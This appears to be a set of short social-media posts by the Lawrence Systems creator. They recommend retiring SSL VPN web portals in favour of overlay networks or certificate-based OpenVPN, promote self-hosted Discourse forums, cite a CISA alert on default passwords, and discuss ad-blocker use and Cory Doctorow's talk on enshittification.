There are two type of SSL VPN Web Interfaces: Those that have been exploited and those that will be exploited.

I get the wonderful convenience of having a nice web interface for users to log into but for companies that care about security these should be retired.

So what should be used instead? There are a few options, first there are plenty of overlay networks options https://www.youtube.com/watch?v=eCXl09h7lqo

Second is using VPN setups such as OpenVPN with a certificate that have to be in place prior to the user/pass auth starting as this greatly reduces the threat surface.
https://youtu.be/I61t7aoGC2Q

Let's talk about building community and owning the platform.

I started my forums back in 2019 and here ins 2024 I have over 6,000 registered users (it's free to sign up). I keep my forums public allowing the solutions me and all the amazing community members post there to be easily found by the search systems which has lead to a good amount of traffic. Currently I get over 7 million hits a week from over 50,000 unique visitors.

I am posting this because people should know that locking their data & their audiences up in proprietary platforms is not the best way or the only way to do it. I chose to build my forums with the open source tool Discourse

Relying on proprietary platforms for community building is akin to building a house on rented land, where the landlord can change the terms of your lease on a whim, or worse, evict you entirely. That's why tools like Discourse represent a beacon of hope. They're not just forums; they're fortresses of freedom in the online world, a foundation for a community that you and your members own. You're immune to the capricious whims of platform giants who view your community as mere data points for their algorithms. By owning your platform, you ensure that the community and its invaluable interactions remain yours, portable and persistent, a digital agora that can't be walled off or whisked away. It's about reclaiming the web's original promise: a space for unfettered connection and creation, where communities thrive on their own terms.

A link to my forums for those interested in joining

https://forums.lawrencesystems.com/

Here is a related post on the Discourse blog from last year.

https://blog.discourse.org/2023/06/how-lawrence-systems-built-a-thriving-community-using-discourse/

CISA to Manufacturers: Stop Making Hackers' Jobs Easy with Predictable Passwords!

Security is not getting worse, it's always been this bad and there is a big backlog of poor security practices we need to catch up on. The good news is we are slowly getting better.

https://www.cisa.gov/news-events/alerts/2023/12/15/cisa-secure-design-alert-urges-manufacturers-eliminate-default-passwords

Since launching my new site I became curious to just how many people are using ad & tracking blockers.

By looking at the web server logs directly and removing the crawlers, I am getting just under 3,000 unique visitor to my site over a 2 day period and Google Analytics only shows about 600 of them.

If are curious about the tool I used to parse the web logs, I have a video on it here:

https://youtu.be/-B9kE9_N7fo?si=FDqTNmgC_1JZDks-

This was 5 years ago and we now have a word for what causes this:

-----"𝙀𝙣𝙨𝙝𝙞𝙩𝙩𝙞𝙛𝙞𝙘𝙖𝙩𝙞𝙤𝙣"-----

But I am still optimistic of the future and an activist. To be an activist is to want to change the world. To change the world, you need two things: first, an understanding of what’s wrong with it, and second, a theory of how to make it better.

This video by Cory Doctorow talks about both whats wrong and how we can collectively work together to stop the enshitification of the internet. How we can fight back against the "Felony Contempt of Business Model" that these large tech companies engage in.

https://youtu.be/BUaTsSMSbcU?si=Nr-5EUhKBhJ_1eow